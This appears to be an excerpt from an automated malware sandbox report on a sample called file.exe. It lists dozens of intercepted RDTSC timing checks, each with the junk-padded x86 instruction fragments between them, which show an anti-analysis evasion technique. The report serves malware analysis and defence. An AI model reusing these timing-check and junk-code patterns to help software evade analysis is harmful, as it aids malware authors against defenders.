Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68D091 second address: 68D0A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jp 00007F79111F4F25h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68D0A6 second address: 68D0B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68D0B0 second address: 68D0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C97D second address: 68C99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F79113F07A2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C99B second address: 68C99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C99F second address: 68C9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F79113F0796h 0x00000010 js 00007F79113F0796h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C9B5 second address: 68C9BF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C9BF second address: 68C9C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CDAA second address: 68CDCA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F79111F4F06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 690D97 second address: 690D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 690D9D second address: 690DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F01h 0x00000007 jmp 00007F79111F4EFFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FFFE second address: 690008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 690008 second address: 69002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F79111F4F00h 0x0000000e pop eax 0x0000000f ja 00007F79111F4EFEh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69002C second address: 690030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6901A5 second address: 6901BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79111F4EF6h 0x00000008 jp 00007F79111F4EF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F79111F4EF6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6901BD second address: 6901DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A9h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6901DC second address: 6901F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFBh 0x00000007 pushad 0x00000008 jnp 00007F79111F4EF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69047F second address: 690498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79113F07A1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 690498 second address: 69049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69049E second address: 6904A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6904A4 second address: 6904A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6908F8 second address: 6908FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6908FE second address: 690932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F07h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F79111F4EFDh 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 696D8B second address: 696D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 696D8F second address: 696D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 697055 second address: 697059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 697321 second address: 697327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6978AD second address: 6978B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6983DA second address: 6983DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6983DE second address: 6983E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6983E4 second address: 6983EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6983EA second address: 69840D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79113F07A9h 0x00000009 jg 00007F79113F0796h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69840D second address: 698411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC14 second address: 69BC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC18 second address: 69BC2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007F79111F4EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F79111F4EF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC2C second address: 69BC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC30 second address: 69BC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F79111F4EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC3C second address: 69BC5E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79113F07ACh 0x00000008 jmp 00007F79113F07A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC5E second address: 69BC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC64 second address: 69BC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC68 second address: 69BC6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BC6E second address: 69BC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F79113F079Dh 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BDC5 second address: 69BDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C08C second address: 69C098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C098 second address: 69C09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C09E second address: 69C0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79113F07A9h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C0C2 second address: 69C0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C0C8 second address: 69C0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F79113F07A2h 0x0000000b jmp 00007F79113F07A6h 0x00000010 pushad 0x00000011 je 00007F79113F0796h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C0FE second address: 69C104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C25F second address: 69C263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C263 second address: 69C274 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C274 second address: 69C27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C27D second address: 69C281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C437 second address: 69C451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F07A1h 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C6C1 second address: 69C6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C815 second address: 69C819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7A90 second address: 6A7A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7A96 second address: 6A7A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7C0E second address: 6A7C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7C12 second address: 6A7C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7C18 second address: 6A7C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7C1E second address: 6A7C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F79113F0796h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7C2A second address: 6A7C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F03h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F79111F4F02h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F79111F4EFBh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7C64 second address: 6A7C88 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F79113F0796h 0x00000009 jmp 00007F79113F07A6h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7C88 second address: 6A7C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7F92 second address: 6A7F9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A80E8 second address: 6A80FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F79111F4EF6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A80FE second address: 6A811E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F79113F07A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A811E second address: 6A8124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A8124 second address: 6A8133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 jbe 00007F79113F079Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A8283 second address: 6A8297 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79111F4EF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F79111F4EF8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A858A second address: 6A858E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8709 second address: 6A870E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A9081 second address: 6A9087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7584 second address: 6A7593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007F79111F4EF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7593 second address: 6A759B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A759B second address: 6A75A5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79111F4EFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A75A5 second address: 6A75C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F79113F07A4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1A3C second address: 6B1A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1407 second address: 6B140F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B140F second address: 6B1423 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79111F4EFAh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F79111F4EF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B15C9 second address: 6B15CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B171D second address: 6B1726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEE6D second address: 6BEE86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79113F07A1h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEE86 second address: 6BEEA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F79111F4F07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D1ABF second address: 6D1AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D1AC5 second address: 6D1ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9255 second address: 6D9261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F79113F0796h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9261 second address: 6D9265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9265 second address: 6D926F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79113F0796h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D969A second address: 6D96B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F05h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D996B second address: 6D996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D996F second address: 6D9973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9973 second address: 6D99A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F79113F079Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F79113F07A5h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9C46 second address: 6D9C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F79111F4EF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9C62 second address: 6D9C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9C66 second address: 6D9C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9C70 second address: 6D9C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA6F7 second address: 6DA702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA702 second address: 6DA706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFB26 second address: 6DFB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFB2A second address: 6DFB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F79113F07A7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFB4D second address: 6DFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF6DB second address: 6DF6E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF6E1 second address: 6DF6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
